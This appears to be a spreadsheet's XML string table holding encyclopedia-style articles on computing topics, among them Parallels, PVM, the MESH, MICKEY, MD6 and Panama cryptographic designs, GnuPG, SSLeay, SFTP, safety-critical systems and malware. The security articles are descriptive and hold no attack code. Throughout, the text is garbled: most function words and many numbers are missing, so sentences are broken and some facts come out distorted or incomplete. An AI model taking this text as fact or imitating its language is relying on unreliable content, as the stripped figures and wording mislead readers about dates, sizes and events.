8.1. windows must generally installed dvd, since microsoft offered ".exe" version windows downloadable form, offer ".iso" version download. microsoft released version windows months earlier. leopard server, snow leopard server, lion (only lion host various linux distributions freebsd ecomstation, os/2, solaris also desktop virtualization virtual machine platform virtualization virtualization virtual disk image references external links official website</t>
  </si>
  <si>
    <t>Parallels (company)</t>
  </si>
  <si>
    <t>parallels software company based bellevue, washington; primarily involved development virtualization software macos. company offices countries, including united states, germany, united kingdom, france, japan, china, spain, russia, australia employees. company history swsoft, privately held server automation virtualization software company, developed software running data centers, particularly web-hosting services companies application service providers. their virtuozzo product early system-level server virtualization solution, 2003 bought plesk, commercial hosting platform.in 2004, swsoft acquired parallels, inc. parallels workstation windows linux released, parallels desktop following mid-2006. swsoft's acquisition parallels less kept wraps january 2004, years parallels became mainstream. later year corporate headquarters moved herndon, virginia renton, washington. apple's worldwide developers conference 2007 francisco, california, parallels announced demonstrated upcoming parallels server mac. parallels server reportedly allow managers multiple server operating systems single xserve.in 2007, german company netsys gmbh sued parallels' german distributor avanquest copyright violation (see parallels desktop details), parallels server announced wwdc, later parallels technology network.in 2008, swsoft merged parallels become company parallels branding acquired moderngigabyte, llc. parallels server launched june september parallels desktop windows linux, rename parallels workstation release, parallels desktop later year. from next version, 6.0, windows linux software became known parallels workstation again. over next three years, company launched parallels desktop mac, parallels desktop mac, parallels server mini edition, parallels transporter, parallels workstation extreme, parallels desktop mac, parallels mobile ios, parallels workstation 6.during 2012, 2013 2014, company discontinued parallels server mac, windows linux, launched parallels desktop management microsoft system center configuration manager. released parallels desktop mac. parallels acquired software february 2015, rebranded service provider business odin, later selling odin service automation platform ingram micro. they also released parallels management v4.0 microsoft sccm parallels desktop mac. 2017, virtuozzo plesk, products pre-parallels history swsoft, spun out.in december 2018, corel announced acquired parallels.on october 2020 announced google partnered bring full-featured windows applications enterprises cloud workers using chrome enterprise. "chrome increasingly chosen modern enterprises, either remote work, hybrid, office," said john solomon, vice president chrome google, thrilled partner parallels bring legacy full-featured windows applications support, parallels desktop chromebook enterprise, help businesses easily transition cloud-first devices workflows." current products parallels desktop virtualization platform macos. parallels delivers virtual desktops extends microsoft remote desktop session host desktop sessions applications users microsoft protocol. parallels toolbox software containing links common functions. parallels access remote desktop platform. parallels desktop chrome os—run full-featured windows applications, including native microsoft office, chrome devices—online offline. references</t>
  </si>
  <si>
    <t>Parallel Virtual Machine</t>
  </si>
  <si>
    <t>parallel virtual machine (pvm) software tool parallel networking computers. designed allow network heterogeneous unix and/or windows machines used single distributed parallel processor. thus large computational problems solved cost effectively using aggregate power memory many computers. software portable; source code, available free netlib, compiled everything laptops crays.pvm enables users exploit existing computer hardware solve much larger problems less additional cost. used educational tool teach parallel programming also used solve important practical problems. developed university tennessee, ridge national laboratory emory university. first version written ornl 1989, rewritten university tennessee, version released march 1991. version released march 1993, supported fault tolerance better portability. step towards modern trends distributed processing grid computing has, since mid-1990s, largely supplanted much successful standard message passing parallel machines. free software, released license general public license. design software system enables collection heterogeneous computers used coherent flexible concurrent computational resource, "parallel virtual machine". individual computers shared-memory local-memory multiprocessors, vector supercomputers, specialized graphics engines, scalar workstations pcs, interconnected variety networks, ethernet fddi. consists run-time environment library message-passing, task resource management, fault notification. while automatically make commercial software package faster, provide powerful functions manually parallelizing existing source program, writing parallel/distributed programs. software must specifically installed every machine used given "virtual machine". there "automatic" installation executables onto remote machines pvm, although simply copying pvm3/lib pvm3/bin directories another similar machine (and setting $pvm_root $pvm_arch) sufficient running programs. compiling building programs requires full installation. user programs written c++, fortran access provided library routines. also supports broadcasting (pvm_bcast) sends processes group multicasting (pvm_mcast) sends specific list processes. also corba globus alliance occam programming language ease programming language linda (coordination language) calculus communicating systems calculus broadcasting systems message passing interface (mpi) references external links official website parawiki: parallel virtual machine wayback machine (archived march 2007)</t>
  </si>
  <si>
    <t>MESH (cipher)</t>
  </si>
  <si>
    <t>cryptography, mesh block cipher designed 2002 jorge nakahara, jr., vincent rijmen, bart preneel, joos vandewalle. mesh based directly idea uses basic operations. mesh actually family variant ciphers block sizes bits. size twice block size. number rounds 8.5, 10.5, 12.5, depending block size. algorithm uses lai–massey scheme based idea's, larger round structure, "ma-box". mesh also complex schedule idea, intended prevent weak keys insecure patterns subkeys. references nakahara, rijmen; preneel; vandewalle (2002). "the mesh block ciphers". citeseerx 10.1.1.10.2249. {{cite journal}}: cite journal requires |journal= (help) nakahara jr.; preneel vandewalle (2003). "the biryukov-demirci attack idea mesh ciphers" (pdf/postscript). retrieved october 2007. {{cite journal}}: cite journal requires |journal= (help)</t>
  </si>
  <si>
    <t>Parallel Computers, Inc.</t>
  </si>
  <si>
    <t>parallel computers, inc. american computer manufacturing company, based santa cruz, california, made fault-tolerant computer systems based around unix operating system various processors motorola 68000 series. history company founded 1983 premised idea providing less expensive alternative existing fault-tolerant solutions, would attractive smaller businesses. over time received million venture capital funding. parallel computers part wave technology companies based area 1980s, santa cruz operation well-known them. parallel computers also number companies focusing fault-tolerant solutions inspired success tandem computers. other companies included stratus computer, tolerant systems, sequoia systems, synapse computer, auragen systems, halt computers, corinthian systems, enmasse, computer consoles inc.parallel computers made systems featured redundant hardware elements processors storage power supplies, self-detected error situations. their systems supermicrocomputer minicomputer ranges size. difficulties building fault-tolerant systems considerable, however, including unsuitability unix purpose, parallel systems like companies space severely underestimated engineering tasks involved. significant product delays resulted consequence, layoffs, parallel computers changed chief executive 1984.by 1986 parallel million annual sales employed people. however made fewer hundred sales, industry analyst surmised small business marketplace parallel targeting often sophisticated enough recognize value fault-tolerant solutions. moreover, company's sales force small scale manufacturing capabilities limited. parallel agreements likes scientific games corporation, used resellers united kingdom systime computers ltd, sales channels well.accordingly, parallel's management decided company viable own, parallel computers sold general automation 1987, becoming wholly owned subsidiary. sold 1988, british computer manufacturing firm integrated micro products (imp), following disappointing sales parallel product. following that, parallel computers production facility gatos, california shut manufacturing moved north england. imp, focusing telecommunications equipment, eventually acquired microsystems march 1996 million. references</t>
  </si>
  <si>
    <t>MICKEY</t>
  </si>
  <si>
    <t>cryptography, mutual irregular clocking keystream generator (mickey) stream cipher algorithm developed steve babbage matthew dodd. cipher designed used hardware platforms limited resources, three ciphers accepted profile estream portfolio. algorithm patented free use. structure cipher maps 80-bit variable length initialization vector bits) keystream maximum length bits. keystream generation keystream generator makes registers (100 bits each). registers updated non-linear manner using control variables: input input control control referred earlier, implementation cipher contains flip-flops registers control variables. furthermore, must flip-flops counter register keep track number rounds preclock stage. keystream production stage mickey preceded three stages:- loading, loading preclock. initially registers initialized zero state. difference trivium unlike trivium, mickey allow direct loading bits state register. mentioned earlier, initially registers initialized zero state. then variable length used update state successively executing clock routine. protection scan chain mickey protected xor-chain structure. attacker following advantages: knows algorithm mickey initial vectors choice. remains secret. scan-in scan-out vectors choice.to hide mapping scan cells actual variables cipher drove previous single-feedback double-feedback xor-chain schemes. also falling prey cryptanalysis, shown previous section, move towards secure architecture, named random xor-chain (rxor-chain) structure. countermeasure mickey flipped-scan countermeasure technique protect scan-chains proposed earlier. this involved placing inverters random points scan-chain. security stemmed fact adversary could guess number positions inverters. this technique cryptanalyzed using reset attack. shown flip-flops scan-chain initially reset, positions inverters completely determined transitions scanned-out vector. alternative, xor-chain based countermeasure proposed. technique involves placing gates random points chain. security stems fact adversary unable guess number positions gates. uses scan-based widely used scheme integrated circuit testing simple yields high fault coverage. advantage scan-based testing provides full observability controllability internal nodes cryptanalysis 2013, differential fault attack reported mickey subhadeep banik subhamoy maitra. references external links estream page mickey differential fault attack mickey scan-chain based attacks hardware implementation fpga implementations</t>
  </si>
  <si>
    <t>MD6</t>
  </si>
  <si>
    <t>message-digest algorithm cryptographic hash function. uses merkle tree-like structure allow immense parallel computation hashes long inputs. authors claim performance cycles byte md6-256 intel core provable resistance differential cryptanalysis. source code reference implementation released license.speeds excess gb/s reported possible long messages 16-core architecture.in december 2008, douglas held fortify software discovered buffer overflow original hash algorithm's reference implementation. this error later made public rivest february 2009, release corrected reference implementation advance fortify report.md6 submitted nist sha-3 competition. however, july 2009, rivest posted comment nist ready candidate sha-3 speed issues, "gap proof submitted version resistant differential attacks", inability supply proof faster reduced-round version, although rivest also stated website withdrawn formally. advance second round sha-3 competition. september 2011, paper presenting improved proof faster reduced-round versions resistant differential attacks posted website. also comparison cryptographic hash functions references external links website reference paper</t>
  </si>
  <si>
    <t>Safety-critical system</t>
  </si>
  <si>
    <t>safety-critical system (scs) life-critical system system whose failure malfunction result more) following outcomes: death serious injury people loss severe damage equipment/property environmental harma safety-related system sometimes safety-involved system) comprises everything (hardware, software, human aspects) needed perform safety functions, failure would cause significant increase safety risk people environment involved. safety-related systems full responsibility controlling hazards loss life, severe injury severe environmental damage. malfunction safety-involved system would hazardous conjunction failure systems human error. some safety organizations provide guidance safety-related systems, example health safety executive (hse) united kingdom.risks sort usually managed methods tools safety engineering. safety-critical system designed lose less life billion (109) hours operation. typical design methods include probabilistic risk assessment, method combines failure mode effects analysis (fmea) fault tree analysis. safety-critical systems increasingly computer-based. reliability regimes several reliability regimes safety-critical systems exist: fail-operational systems continue operate control systems fail. examples include elevators, thermostats home furnaces, passively safe nuclear reactors. fail-operational mode sometimes unsafe. nuclear weapons launch-on-loss-of-communications rejected control system u.s. nuclear forces fail-operational: loss communications would cause launch, mode operation considered risky. this contrasted fail-deadly behavior perimeter system built soviet era. fail-soft systems able continue operating interim basis reduced efficiency case failure. most spare tires example this: they usually come certain restrictions (e.g. speed restriction) lead lower fuel economy. another example "safe mode" found windows operating systems. fail-safe systems become safe cannot operate. many medical systems fall category. example, infusion pump fail, long alerts nurse ceases pumping, threaten loss life safety interval long enough permit human response. similar vein, industrial domestic burner controller fail, must fail safe mode (i.e. turn combustion detect faults). famously, nuclear weapon systems launch-on-command fail-safe, communications systems fail, launch cannot commanded. railway signaling designed fail-safe. fail-secure systems maintain maximum security cannot operate. example, fail-safe electronic doors unlock power failures, fail-secure ones lock, keeping area secure. fail-passive systems continue operate event system failure. example includes aircraft autopilot. event failure, aircraft would remain controllable state allow pilot take complete journey perform safe landing. fault-tolerant systems avoid service failure faults introduced system. example include control systems ordinary nuclear reactors. normal method tolerate faults several computers continually test parts system, switch spares failing subsystems. long faulty subsystems replaced repaired normal maintenance intervals, systems considered safe. computers, power supplies control terminals used human beings must duplicated systems fashion. software engineering safety-critical systems software engineering safety-critical systems particularly difficult. there three aspects applied engineering software life-critical systems. first process engineering management. secondly, selecting appropriate tools environment system. this allows system developer effectively test system emulation observe effectiveness. thirdly, address legal regulatory requirements, requirements aviation. setting standard system required developed under, forces designers stick requirements. avionics industry succeeded producing standard methods producing life-critical avionics software. similar standards exist industry, general, (iec 61508) automotive (iso 26262), medical (iec 62304) nuclear (iec 61513) industries specifically. standard approach carefully code, inspect, document, test, verify analyze system. another approach certify production system, compiler, generate system's code specifications. another approach uses formal methods generate proofs code meets requirements. approaches improve software quality safety-critical systems testing eliminating manual steps development process, people make mistakes, mistakes common cause potential life-threatening errors. examples safety-critical systems infrastructure circuit breaker emergency services dispatch systems electricity generation, transmission distribution fire alarm fire sprinkler fuse (electrical) fuse (hydraulic) life support systems telecommunications medicine technology requirements beyond avoidance failure, even facilitate medical intensive care (which deals healing patients), also life support (which stabilizing patients). heart-lung machines mechanical ventilation systems infusion pumps insulin pumps radiation therapy machines robotic surgery machines defibrillator machines pacemaker devices dialysis machines devices electronically monitor vital functions (electrography; especially, electrocardiography, ekg, electroencephalography, eeg) medical imaging devices ray, computerized tomography- cat, different magnetic resonance imaging- mri- techniques, positron emission tomography- pet) even healthcare information systems significant safety implications nuclear engineering nuclear reactor control systems recreation amusement rides climbing equipment parachutes scuba equipment diving rebreather dive computer (depending use) transport railway railway signalling control systems platform detection control train doors automatic train stop automotive airbag systems braking systems seat belts power steering systems advanced driver-assistance systems electronic throttle control battery management system hybrids electric vehicles electric park brake shift wire systems drive wire systems park wire aviation traffic control systems avionics, particularly fly-by-wire systems radio navigation raim engine control systems aircrew life support systems flight planning determine fuel requirements flight spaceflight human spaceflight vehicles rocket range launch safety systems launch vehicle safety crew rescue systems crew transfer systems also safety-critical systems club mission critical factor critical operation organization reliability engineering sub-discipline systems engineering emphasizes dependability redundancy (engineering) duplication critical components increase reliability system factor safety system strength beyond intended load nuclear reactor device used initiate control nuclear chain reaction biomedical engineering application engineering principles design concepts medicine biology. saphire systems analysis programs hands-on integrated reliability evaluations (risk analysis software) formal methods mathematical program specification intended allow correctness proofs, including algorithmically therac-25 radiotherapy machine involved accidents zonal safety analysis high integrity software real-time computing references external links example life-critical system safety-critical systems virtual library explanation fail operational fail passive avionics</t>
  </si>
  <si>
    <t>MacGPG</t>
  </si>
  <si>
    <t>privacy guard (gnupg gpg) free-software replacement symantec's cryptographic software suite. software compliant 4880, ietf standards-track specification openpgp. modern versions interoperable gnupg openpgp-compliant systems.gnupg part project received major funding german government 1999. overview gnupg hybrid-encryption software program uses combination conventional symmetric-key cryptography speed, public-key cryptography ease secure exchange, typically using recipient's public encrypt session used once. this mode operation part openpgp standard part first version. gnupg series uses integrated cryptographic library, gnupg series replaces libgcrypt. gnupg encrypts messages using asymmetric pairs individually generated gnupg users. resulting public keys exchanged users variety ways, internet servers. they must always exchanged carefully prevent identity spoofing corrupting public "owner" identity correspondences. also possible cryptographic digital signature message, message integrity sender verified, particular correspondence relied upon corrupted. gnupg also supports symmetric encryption algorithms. default, gnupg uses symmetrical algorithm since version 2.1, cast5 used earlier versions. gnupg patented otherwise restricted software algorithms. instead, gnupg uses variety other, non-patented algorithms.for long time, support idea encryption algorithm used pgp. fact possible idea gnupg downloading plugin however, might require license uses countries idea patented. starting versions 1.4.13 2.0.20, gnupg supports idea last patent idea expired 2012. support idea intended questions folks either trying decrypt data migrating keys gnupg", hence recommended regular use. more recent releases gnupg ("modern" deprecated "stable" series) expose cryptographic functions algorithms libgcrypt (its cryptography library) provides, including support elliptic curve cryptography (ecdh, ecdsa eddsa) "modern" series (i.e. since gnupg 2.1). algorithms versions, gnupg supports following algorithms: public rsa, elgamal, dsa, ecdh (cv25519, cv448, nistp256, nistp384, nistp521, brainpoolp256r1, brainpoolp384r1, brainpoolp512r1, secp256k1), ecdsa (nistp256, nistp384, nistp521, brainpoolp256r1, brainpoolp384r1, brainpoolp512r1, secp256k1), eddsa (ed25519, ed448) cipher 3des, idea (for backward compatibility), cast5, blowfish, twofish, aes-128, aes-192, aes-256, camellia-128, -192 -256 hash md5, sha-1, ripemd-160, sha-256, sha-384, sha-512, sha-224 compression uncompressed, zip, zlib, bzip2 history gnupg initially developed werner koch. first production version, version 1.0.0, released september 1999, almost years first gnupg release (version 0.0.0). german federal ministry economics technology funded documentation port microsoft windows 2000.gnupg system compliant openpgp standard, thus history openpgp importance; designed interoperate pgp, email encryption program initially designed developed phil zimmermann.on february 2014, gnupg crowdfunding effort closed, raising €36,732 site infrastructure improvements. branches since release stable gnupg 2.3, starting version 2.3.3 october 2021, three stable branches gnupg actively maintained: "stable branch", currently 2021) branch. "lts (long-term support) branch", currently 2021) branch (which formerly called "modern branch", comparison branch). "legacy branch" (formerly called "classic branch"), stay branch.before gnupg 2.3, stable branches gnupg actively maintained: "modern" (2.2), numerous features, elliptic curve cryptography, compared former "stable" (2.0) branch, replaced release gnupg 2.2.0 august 2017. initially released november 2014. "classic" (1.4), old, still maintained stand-alone version, suitable outdated embedded platforms. initially released december 2004.different gnupg versions (e.g. branches) cannot installed time. however, possible install "classic" gnupg version (i.e. branch) along gnupg version.before release gnupg ("modern"), deprecated "stable" branch (2.0) recommended general use, initially released november 2006. this branch reached end-of-life december 2017; last version 2.0.31, released december 2017.before release gnupg 2.0, stable releases originated single branch; i.e., november 2006, multiple release branches maintained parallel. these former, sequentially succeeding 1.4) release branches were: branch, initially released september 2002, 1.2.6 last version, released october 2004. branch, initially released september 1999, 1.0.7 last version, released april 2002.(note release gnupg 2.3.0, branches minor release number (e.g. 2.1, 1.9, 1.3) development branches leading stable release branch 0.1" higher version number (e.g. 2.2, 2.0, 1.4); hence branches belong "modern" series, "stable" series, branches belong "classic" series. with release gnupg 2.3.0, nomenclature altered composed "stable" "lts" branch "modern" series, plus last maintained "classic" branch. also note even minor release numbers indicate stable development release branch, anymore.) platforms although basic gnupg program command-line interface, exists various front-ends provide graphical user interface. example, gnupg encryption support integrated kmail evolution, graphical email clients found gnome, popular linux desktops. there also graphical gnupg front-ends, example seahorse gnome kgpg kleopatra kde. gpgtools provides number front-ends integration encryption management well gnupg installations installer packages macos. suite installs related openpgp applications (gpg keychain), plugins (gpg mail) dependencies (macgpg), along services (integration macos services menu) gnupg based encryption. instant messaging applications fire automatically secure messages gnupg installed configured. web-based software horde also makes cross-platform extension enigmail provides gnupg support mozilla thunderbird seamonkey. similarly, enigform provides gnupg support mozilla firefox. firegpg discontinued june 2010.in 2005, code gmbh intevation gmbh released gpg4win, software suite includes gnupg windows, privacy assistant, gnupg plug-ins windows explorer outlook. these tools wrapped standard windows installer, making easier gnupg installed used windows systems. vulnerabilities openpgp standard specifies several methods digitally signing messages. 2003, error change gnupg intended make methods efficient, security vulnerability introduced. affected method digitally signing messages, releases gnupg (1.0.2 1.2.3), fewer 1000 keys listed servers. most people method, case discouraged damage caused any, since none publicly reported) would appear minimal. support method removed gnupg versions released discovery (1.2.4 later). vulnerabilities discovered early 2006; first scripted uses gnupg signature verification result false positives, second non-mime messages vulnerable injection data covered digital signature, would reported part signed message. cases updated versions gnupg made available time announcement. june 2017, vulnerability (cve-2017-7526) discovered within libgcrypt bernstein, breitner others: library used gnupg, enabled full recovery rsa-1024 1/8th rsa-2048 keys. this side-channel attack exploits fact libgcrypt used sliding windows method exponentiation leads leakage exponent bits full recovery. again, updated version gnupg made available time announcement. october 2017, roca vulnerability announced affects keys generated yubikey tokens, often used pgp/gpg. many published keys found susceptible.around june 2018, sigspoof attacks announced. these allowed attacker convincingly spoof digital signatures.in january 2021, libgcrypt 1.9.0 released, found contain severe simple exploit. released days later libgcrypt 1.9.1. also notes references external links official website short history privacy guard, written werner koch, published gnupg's 10th birthday</t>
  </si>
  <si>
    <t>Panama (cryptography)</t>
  </si>
  <si>
    <t>panama cryptographic primitive used hash function stream cipher, hash function mode operation broken suitable cryptographic use. based steprightup, designed joan daemen craig clapp presented paper fast hashing stream encryption panama fast software encryption (fse) conference 1998. cipher influenced several designs, example mugi sha-3.the primitive used hash function stream cipher. stream cipher uses 256-bit performance cipher good reaching cycles byte. hash function hash function, collisions shown vincent rijmen paper producing collisions panama presented 2001. attack shows computational complexity negligible memory requirements.at 2007, joan daemen gilles assche presented practical attack panama hash function generates collision evaluations state updating function.guido bertoni, joan daemen, michaël peeters, gilles assche, nist's 2006 second cryptographic hash workshop, unveiled panama variant called radiogatún. hash function workings radiogatún known weaknesses panama's hash function has. turn, radiogatún inspired cryptographic standard sha-3. also hash function security summary references external links john savard's page panama</t>
  </si>
  <si>
    <t>SSLeay</t>
  </si>
  <si>
    <t>ssleay open-source implementation. developed eric andrew young hudson implementation using encryption. recommended pronunciation letter s-s-l-e-a-y first developed eric young ("eay"). ssleay also included implementation earlier work eric young believed first open-source implementation des. development ssleay unofficially mostly ended, volunteers forked project openssl banner around december 1998, eric commenced working security australia. ssleay ssleay developed eric young, starting 1995. windows support added hudson. patches open source applications support using ssleay produced hudson. development young hudson ceased 1998. ssleay library codebase licensed ssleay license, form free software license. ssleay license bsd-style open-source license, almost identical four-clause license.ssleay supports x.509v3 certificates pkcs#10 certificate requests. supports ssl2 ssl3. also supported tlsv1.the first secure implementation created using ssleay hudson.the first open source certifying authority implementation created scripts using ssleay clifford heath. forks openssl fork successor project ssleay similar interface after young hudson joined corporation, volunteers forked ssleay continued development openssl.bsafe ssl-c fork ssleay developed eric young hudson corporation. released part bsafe ssl-c. references external links ssleay documentation archive sslapps notes also gnutls openssl, major fork ssleay libressl, major fork openssl wolfssl</t>
  </si>
  <si>
    <t>SSH File Transfer Protocol</t>
  </si>
  <si>
    <t>computing, file transfer protocol (also secure file transfer protocol, sftp) network protocol provides file access, file transfer, file management reliable data stream. designed internet engineering task force (ietf) extension secure shell protocol (ssh) version provide secure file transfer capabilities. ietf internet draft states that, even though protocol described context ssh-2 protocol, could used number different applications, secure file transfer transport layer security (tls) transfer management information applications. this protocol assumes secure channel, ssh, server already authenticated client, identity client user available protocol. capabilities compared protocol, allows file transfers, sftp protocol allows range operations remote files make like remote file system protocol. sftp client's extra capabilities include resuming interrupted transfers, directory listings, remote file removal.sftp attempts platform-independent scp; scp, instance, expansion wildcards specified client server, whereas sftp's design avoids problem. while frequently implemented unix platforms, sftp servers commonly available platforms. file transfer fast compared sftp protocol back forth nature sftp protocol. sftp, file transfer easily terminated without terminating session like mechanisms sftp ssh, rather protocol designed ground ietf secsh working group. sometimes confused simple file transfer protocol.the protocol provide authentication security; expects underlying protocol secure this. sftp often used subsystem protocol version implementations, designed working group. possible, however, ssh-1 (and implementations support this) data streams. running sftp server ssh-1 platform-independent ssh-1 support concept subsystems. sftp client willing connect ssh-1 server needs know path sftp server binary server side. uploaded files associated basic attributes, time stamps. this advantage common protocol. history development internet engineering task force (ietf) working group "secsh" responsible development secure shell version protocol (rfc 4251) also attempted draft extension standard secure file transfer functionality. internet drafts created successively revised protocol versions. software industry began implement various versions protocol drafts standardized. development work progressed, scope secsh file transfer project expanded include file access file management. eventually, development stalled committee members began view sftp file system protocol, file access file transfer protocol, places beyond purview working group. after seven-year hiatus, 2013 attempt made restart work sftp using version draft baseline. versions prior ietf's involvement, sftp proprietary protocol communications security, designed tatu ylönen assistance sami lehtinen 1997. differences versions version enumerated upon section draft-ietf-secsh-filexfer-02. version outset ietf secure shell file transfer project, secsh group stated objective file transfer protocol provide secure file transfer functionality reliable data stream, standard file transfer protocol ssh-2 protocol. drafts 00–02 ietf internet draft define successive revisions version sftp protocol. file transfer protocol, draft january 2001 file transfer protocol, draft march 2001 file transfer protocol, draft october 2001 version drafts 03–04 ietf internet draft define version protocol. file transfer protocol, draft october 2002 file transfer protocol, draft december 2002 version draft ietf internet draft defines version protocol. file transfer protocol, draft january 2004 version drafts 06–13 ietf internet draft define successive revisions version protocol. file transfer protocol, draft october 2004 file transfer protocol, draft march 2005 file transfer protocol, draft april 2005 file transfer protocol, draft june 2005 file transfer protocol, draft june 2005 file transfer protocol, draft january 2006 file transfer protocol, draft january 2006 file transfer protocol, draft july 2006 software sftp client term sftp also refer secure file transfer program, command-line program implements client part protocol. example, sftp program supplied openssh implements this.some implementations program support sftp protocols perform file transfers, depending server supports. sftp server some server implementations implement sftp protocol; however, outside dedicated file servers, sftp protocol support usually provided server implementation, shares default port services. sftp implementations include protocol implementation leverage integration connection details preexisting server access controls, alternative server tolerable alternative ports used. ssh-2 server supports subsystems leveraged keep uniform implementation enhancing access controls third party software, cost fine-grained integration connection details, ssh-1 compatibility. sftp proxy difficult control sftp transfers security devices network perimeter. there standard tools logging transactions, like gdev suse proxy, sftp encrypted, rendering traditional proxies ineffective controlling sftp traffic. there tools implement man-in-the-middle also feature sftp control. examples tool shell control balabit cryptoauditor communications security (the original developer secure shell protocol) provides functions sftp transaction logging logging actual data transmitted wire. also comparison clients comparison servers comparison file transfer protocols fish ftps lsh—a ssh-2 sftp server unix-like oses sshfs—mounting remote filesystem using sftp category:ftp clients category:ssh file transfer protocol clients references</t>
  </si>
  <si>
    <t>Malware analysis</t>
  </si>
  <si>
    <t>malware analysis study process determining functionality, origin potential impact given malware sample virus, worm, trojan horse, rootkit, backdoor. malware malicious software computer software intended harm host operating system steal sensitive data users, organizations companies. malware include software gathers user information without permission. cases there three typical cases drive need malware analysis: computer security incident management: organization discovers suspects malware gotten systems, response team wish perform malware analysis potential samples discovered investigation process determine malware and, impact malware might systems within target organizations' environment. malware research: academic industry malware researchers perform malware analysis simply understand malware behaves latest techniques used construction. indicator compromise extraction: vendors software products solutions perform bulk malware analysis order determine potential indicators compromise; information feed security product solution help organizations better defend attack malware. types method malware analysis performed typically falls types: static malware analysis: static code analysis usually performed dissecting different resources binary file without executing studying component. binary file also disassembled reverse engineered) using disassembler ghidra. machine code sometimes translated assembly code read understood humans: malware analyst read assembly correlated specific functions actions inside program, make sense assembly instructions better visualization program originally designed. viewing assembly allows malware analyst/reverse engineer better understanding supposed happen versus really happening start hidden actions unintended functionality. some modern malware authored using evasive techniques defeat type analysis, example embedding syntactic code errors confuse disassemblers still function actual execution. dynamic malware analysis: dynamic behavioral analysis performed observing behavior malware actually running host system. this form analysis often performed sandbox environment prevent malware actually infecting production systems; many sandboxes virtual systems easily rolled back clean state analysis complete. malware also debugged running using debugger windbg watch behavior effects host system malware step step instructions processed. modern malware exhibit wide variety evasive techniques designed defeat dynamic analysis including testing virtual environments active debuggers, delaying execution malicious payloads, requiring form interactive user input. stages examining malicious software involves several stages, including, limited following: manual code reversing interactive behavior analysis static properties analysis fully-automated analysis references</t>
  </si>
  <si>
    <t>Malware research</t>
  </si>
  <si>
    <t>notion self-reproducing computer program traced back initial theories operation complex automata. john neumann showed theory program could reproduce itself. this constituted plausibility result computability theory. fred cohen experimented computer viruses confirmed neumann's postulate investigated properties malware detectability self-obfuscation using rudimentary encryption. 1988 doctoral dissertation subject computer viruses.cohen's faculty advisor, leonard adleman, presented rigorous proof that, general case, algorithmic determination presence virus undecidable. this problem must mistaken determination within broad class programs virus present. this problem differs require ability recognize viruses. adleman's proof perhaps deepest result malware computability theory date relies cantor's diagonal argument well halting problem. ironically, later shown young yung adleman's work cryptography ideal constructing virus highly resistant reverse-engineering presenting notion cryptovirus. cryptovirus virus contains uses public randomly generated symmetric cipher initialization vector (iv) session (sk). cryptoviral extortion attack, virus hybrid encrypts plaintext data victim's machine using randomly generated iv+sk encrypted using virus writer's public key. theory victim must negotiate virus writer iv+sk back order decrypt ciphertext (assuming backups). analysis virus reveals public key, needed decryption, private needed recover this result first show computational complexity theory used devise malware robust reverse-engineering. growing area computer virus research mathematically model infection behavior worms using models lotka–volterra equations, applied study biological virus. various virus propagation scenarios studied researchers propagation computer virus, fighting virus virus like predator codes, effectiveness patching etc. behavioral malware detection researched recently. most approaches behavioral detection based analysis system call dependencies. executed binary code traced using strace precise taint analysis compute data-flow dependencies among system calls. result directed graph {\displaystyle g=(v,e)} nodes system calls, edges represent dependencies. example, {\displaystyle (s,t)\in result returned system call {\displaystyle (either directly result indirectly output parameters) later used parameter system call {\displaystyle origins idea system calls analyze software found work forrest christodorescu point malware authors cannot easily reorder system calls without changing semantics program, makes system call dependency graphs suitable malware detection. they compute difference malware goodware system call dependency graphs resulting graphs detection, achieving high detection rates. kolbitsch pre-compute symbolic expressions evaluate syscall parameters observed runtime. they detect dependencies observing whether result obtained evaluation matches parameter values observed runtime. malware detected comparing dependency graphs training test sets. fredrikson describe approach uncovers distinguishing features malware system call dependency graphs. they extract significant behaviors using concept analysis leap mining. babic recently proposed novel approach malware detection classification based grammar inference tree automata. their approach infers automaton dependency graphs, show automaton could used detection classification malware. research combining static dynamic malware analysis techniques also currently conducted effort minimize shortcomings both. studies researchers islam working integrate static dynamic techniques order better analyze classify malware malware variants. also history computer viruses references</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>malware portmanteau malicious software) software intentionally designed cause disruption computer, server, client, computer network, leak private information, gain unauthorized access information systems, deprive users access information unknowingly interferes user's computer security privacy. contrast, software causes harm deficiency typically described software bug. malware poses serious problems individuals businesses internet. according symantec’s 2018 internet security threat report (istr), malware variants number increased 669,947,865 2017, twice many malware variants 2016. cybercrime, includes malware attacks well crimes committed computer, predicted cost world economy trillion 2021, increasing rate year.many types malware exist, including computer viruses, worms, trojan horses, ransomware, spyware, adware, rogue software, wiper, scareware. defense strategies malware differs according type malware thwarted installing antivirus software, firewalls, applying regular patches reduce zero-day attacks, securing networks intrusion, regular backups isolating infected systems. malware designed evade antivirus software detection algorithms. history notion self-reproducing computer program traced back initial theories operation complex automata. john neumann showed theory program could reproduce itself. this constituted plausibility result computability theory. fred cohen experimented computer viruses confirmed neumann's postulate investigated properties malware detectability self-obfuscation using rudimentary encryption. 1987 doctoral dissertation subject computer viruses. combination cryptographic technology part payload virus, exploiting attack purposes initialized investigated 1990s, includes initial ransomware evasion ideas.before internet access became widespread, viruses spread personal computers infecting executable programs boot sectors floppy disks. inserting copy machine code instructions programs boot sectors, virus causes whenever program disk booted. early computer viruses written apple macintosh, became widespread dominance ms-dos system. first virus "wild" boot sector virus dubbed (c)brain, created 1986 farooq alvi brothers pakistan. malware distributors would trick user booting running infected device medium. example, virus could make infected computer autorunnable code stick plugged anyone attached stick another computer autorun would turn become infected, also pass infection way.older email software would automatically open html email containing potentially malicious javascript code. users also execute disguised malicious email attachments. 2018 data breach investigations report verizon, cited online, states emails primary method malware delivery, accounting malware delivery around world.the first worms, network-borne infectious programs, originated personal computers, multitasking unix systems. first well-known worm internet worm 1988, infected sunos systems. unlike virus, worm insert programs. instead, exploited security holes (vulnerabilities) network server programs started running separate process. this behavior used today's worms well.with rise microsoft windows platform 1990s, flexible macros applications, became possible write infectious code macro language microsoft word similar programs. these macro viruses infect documents templates rather applications (executables), rely fact macros word document form executable code.many early infectious programs, including morris worm, first internet worm, written experiments pranks. today, malware used black hackers governments steal personal, financial, business information. today, device plugs port even lights, fans, speakers, toys, peripherals digital microscope used spread malware. devices infected manufacturing supply quality control inadequate. purposes malware sometimes used broadly government corporate websites gather guarded information, disrupt operation general. however, malware used individuals gain information personal identification numbers details, bank credit card numbers, passwords. since rise widespread broadband internet access, malicious software frequently designed profit. since 2003, majority widespread viruses worms designed take control users' computers illicit purposes. infected "zombie computers" used send email spam, host contraband data child pornography, engage distributed denial-of-service attacks form extortion.programs designed monitor users' browsing, display unsolicited advertisements, redirect affiliate marketing revenues called spyware. spyware programs 